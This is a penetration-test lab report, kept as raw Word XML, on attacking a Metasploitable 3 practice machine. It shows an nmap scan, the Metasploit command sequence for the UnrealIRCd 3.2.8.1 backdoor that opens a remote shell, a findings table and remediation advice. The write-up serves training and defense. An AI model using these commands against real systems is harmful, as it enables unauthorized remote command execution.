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1A4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0354D2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38B295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51B3C6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656DEC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1CDA82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7474B9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41BD8E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1F8BC4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2FEB94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0B271B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Vulnerability Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C4C2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780AB5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0645C8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153F5C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59A875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79B731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12BF8F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056AE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305AC3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68E72B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</w:p>
    <w:p w14:paraId="6C9D8D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both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1FAB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of contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B18C1">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="righ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_Toc11632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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11632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63972EE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_Toc27223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Tools Used</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc27223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1834775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_Toc7481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Methodology</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7481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07FC008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_Toc7487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3.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7487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D02B4E0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_Toc4824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3.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4824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15C5FD1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_Toc20987 </w:instrText>
      </w:r>
      <w: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3.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc20987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DDB4D85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_Toc29180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Exploit used</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc29180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962DE30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_Toc562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Findings</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc562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922F566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_Toc10128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Recommendations</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc10128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00000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  <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List of Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B86099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\t "Heading 4" \h \c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_Toc4202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nmap scan</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc4202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73E30C3F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_Toc12265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successful exploitation in metasploit</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12265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782FF632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_Toc31672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confirmation in metasploitable 3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31672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00000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both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000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List of Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000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2ED942FF">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">TOC \f F \t "Heading 5" \h \c</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc9104 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 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findings</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9104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00000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  <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="317B4D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2A6196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7B163D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447BE6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5A651A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62E579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6686E2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</w:pPr>
    </w:p>
    <w:p w14:paraId="5D1FDD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both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DC1B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both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441823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both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C20B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both"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4BD73C"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left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc11632"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="18486C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The objective of this penetration test was to identify and exploit vulnerabilities within a target Metasploitable 3 machine to demonstrate real-world attack scenarios and validate potential security risks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAB70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Key goals: Perform reconnaissance using network scanning. Identify open ports and services. Select and execute an exploit against a vulnerable service. Gain remote access and confirm successful exploitation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B698D9A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ind w:left="425" w:leftChars="0" w:right="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc27223"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD5C32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Nmap – for port scanning and service enumeration. Metasploit Framework – for vulnerability exploitation and payload execution. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4560801F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40" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc7481"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC769E">
      <w:pPr>
        <w:pStyle w:val="3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left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc7487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05475D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firstLine="7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full TCP scan was performed with Nmap to identify running services: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20D7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 w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploitable ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>192.168.1.43/192.168.1.45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB72F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nmap -sV -p- 192.168.1.43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64556C2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firstLine="7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Port 6697/tcp was identified as running an UnrealIRCd service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764F778E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5700" cy="3092450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="2" name="Picture 2" descr="nmap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map sc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38A8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4" w:name="_Toc4202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nmap scan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6395270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left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3474576A">
      <w:pPr>
        <w:pStyle w:val="3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left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc4824"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7409D7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firstLine="7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Using Metasploit, the UnrealIRCd 3.2.8.1 backdoor exploit was launched: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C1517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 xml:space="preserve">use exploit/unix/irc/unreal_ircd_3281_backdoor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C39F1F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 xml:space="preserve">set RHOSTS 192.168.1.45 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971C4D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 xml:space="preserve">set RPORT 6697 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572F1A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set PAYLOAD cmd/unix/interact </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3663D90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LHOSTS 192.168.1.38 (KALI IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CAD84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LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9BD20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 xml:space="preserve">run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8061D2">
      <w:pPr>
        <w:pStyle w:val="3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left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc20987"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Post-Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5DAD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firstLine="7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After successful exploitation, a remote shell session was established. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631BD4F7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 xml:space="preserve">whoami </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419DD0E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 xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06791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720" w:leftChars="0" w:firstLine="7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 xml:space="preserve">boba_fett </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6912A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This confirmed remote code execution and unauthorized system access. Confirm the same in metasploitable3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7B8F96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8095" cy="3217545"/>
            <wp:effectExtent l="0" t="0" r="12065" b="13335"/>
            <wp:docPr id="8" name="Picture 8" descr="unreal_metasplo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real_metasploi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128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7" w:name="_Toc12265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successful exploitation in metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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4AA032D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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2DF056C6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1810" cy="3500755"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="7" name="Picture 7" descr="metaconfi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etaconfirm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318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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc31672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confirmation in metasploitable 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="65385403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40" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc29180"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exploit used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="288EED7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left"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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Module: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/unix/irc/unreal_ircd_3281_backdoor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EAEB7A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Payload: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd/unix/interact </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AF652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left"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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Type: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Backdoored software (UnrealIRCd 3.2.8.1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF67C7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left"/>
        <w:textAlignment w:val="auto"/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 w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Remote command execution with system-level access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47473BDF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40" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc562"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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0"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="3984"/>
      </w:tblGrid>
      <w:tr w14:paraId="35D0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3475" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F9BE640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/>
              <w:ind w:left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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48B4CC77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/>
              <w:ind w:left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CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="499CB5F4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/>
              <w:ind w:left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 w14:paraId="03E17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75" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="285BBFB8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/>
              <w:ind w:left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UnrealIRCd 3.2.8.1 Backdoor RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47EA4664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/>
              <w:ind w:left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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3939" w:type="dxa"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="030D9FA0"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after="0" w:afterLines="50"/>
              <w:ind w:left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Remote attacker can execute commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5987291A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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc9104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Table 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findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6C70B589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40" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc10128"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771F7914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Immediately remove or upgrade UnrealIRCd 3.2.8.1 to a secure version. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DE800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Regularly update all third-party applications and services. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422BA3B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Restrict unnecessary open ports and services to reduce attack surface. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0068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840" w:leftChars="0" w:hanging="42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Deploy intrusion detection/prevention systems (IDS/IPS) to detect suspicious IRC traffic. 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576" w:footer="43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-Bol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Obliqu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jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:pict>
        <v:rect id="_x0000_i103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02F"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D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-671195</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-281305</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7788275" cy="1024255"/>
          <wp:effectExtent l="0" t="0" r="14605" b="12065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7788275" cy="1023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31E1A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D2E31E1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895B660"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E895B66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04F7B257"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04F7B2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D019E4"/>
    <w:rsid w:val="02017B58"/>
    <w:rsid w:val="023625B0"/>
    <w:rsid w:val="083D1794"/>
    <w:rsid w:val="08C94FF8"/>
    <w:rsid w:val="0C203DF5"/>
    <w:rsid w:val="0E880A3A"/>
    <w:rsid w:val="0E9512FB"/>
    <w:rsid w:val="16393EB4"/>
    <w:rsid w:val="1B217891"/>
    <w:rsid w:val="1E93319C"/>
    <w:rsid w:val="213F068F"/>
    <w:rsid w:val="21B95DF1"/>
    <w:rsid w:val="229F7A26"/>
    <w:rsid w:val="25700DFA"/>
    <w:rsid w:val="2BB07A36"/>
    <w:rsid w:val="2C067F05"/>
    <w:rsid w:val="2D3F104B"/>
    <w:rsid w:val="2ED576A0"/>
    <w:rsid w:val="30145315"/>
    <w:rsid w:val="30CE7FA2"/>
    <w:rsid w:val="32134DB6"/>
    <w:rsid w:val="32A23217"/>
    <w:rsid w:val="33340711"/>
    <w:rsid w:val="354074ED"/>
    <w:rsid w:val="356928AF"/>
    <w:rsid w:val="40313E05"/>
    <w:rsid w:val="408F05F9"/>
    <w:rsid w:val="41C67479"/>
    <w:rsid w:val="42BE2BE5"/>
    <w:rsid w:val="451B3B9E"/>
    <w:rsid w:val="45735AF9"/>
    <w:rsid w:val="49E1738F"/>
    <w:rsid w:val="4BB77389"/>
    <w:rsid w:val="4DEC4CE8"/>
    <w:rsid w:val="4EC85950"/>
    <w:rsid w:val="4F1D2E5C"/>
    <w:rsid w:val="50770CC7"/>
    <w:rsid w:val="59470501"/>
    <w:rsid w:val="597E7B62"/>
    <w:rsid w:val="59BE7110"/>
    <w:rsid w:val="5B21121A"/>
    <w:rsid w:val="5D17062D"/>
    <w:rsid w:val="61F26C63"/>
    <w:rsid w:val="624A4733"/>
    <w:rsid w:val="661A0911"/>
    <w:rsid w:val="6AE17565"/>
    <w:rsid w:val="6BE73308"/>
    <w:rsid w:val="708966DF"/>
    <w:rsid w:val="716F4C2B"/>
    <w:rsid w:val="73B629EC"/>
    <w:rsid w:val="75DB288E"/>
    <w:rsid w:val="76101441"/>
    <w:rsid w:val="76FA5DB4"/>
    <w:rsid w:val="7CA10480"/>
    <w:rsid w:val="7D084EB2"/>
    <w:rsid w:val="7D274676"/>
    <w:rsid w:val="7D6E2658"/>
    <w:rsid w:val="7DE46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50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Arial" w:cs="Arial"/>
      <w:sz w:val="24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after="50"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b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spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24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spacing w:before="50" w:after="50"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="24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8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2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table" w:customStyle="1" w:styleId="23">
    <w:name w:val="TableNormal"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="WPSOffice手动目录 1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table" w:customStyle="1" w:styleId="27">
    <w:name w:val="_Style 12"/>
    <w:basedOn w:val="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4 Char"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/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326</Words>
  <Characters>2149</Characters>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2610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2025-07-26T00:07:00Z</dcterms:created>
  <dc:creator>Mohammed</dc:creator>
  <cp:lastModifiedBy>For Google</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-03T19:04:45Z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54366CA527834595945D8E94F49718FA_13</vt:lpwstr>
  </property>
</Properties>
</file>